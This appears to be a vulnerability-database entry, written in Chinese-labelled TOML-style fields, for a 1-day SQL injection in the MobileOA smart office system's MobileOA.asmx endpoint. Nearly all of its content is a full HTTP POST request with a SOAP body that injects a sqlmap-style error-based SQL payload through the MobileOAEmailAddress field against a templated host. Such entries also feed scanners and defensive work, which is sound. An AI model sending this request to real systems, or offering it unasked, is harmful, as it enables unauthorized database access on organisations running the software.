vendor = "MobileOA"
name = "智能办公系统 MobileOA.asmx SQL注入"
type = "SQL注入"
version = "未知"
path = "/iOffice/prg/set/wss/MobileOA.asmx"
detail = "POST /iOffice/prg/set/wss/MobileOA.asmx HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Content-Type: text/xml; charset=utf-8 <?xml version=\"1.0\" encoding=\"utf-8\"?> <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> <soap:Body> <GeMrNewData xmlns=\"http://tempuri.org/\"> <MobileOAEmailAddress>' AND 5079 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5079=5079) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)))-- eqJq</MobileOAEmailAddress> </GeMrNewData> </soap:Body> </soap:Envelope>"
fix = "缺省规则可检出"
date = "0711"
label = "1day"
verifier = "AdySec"
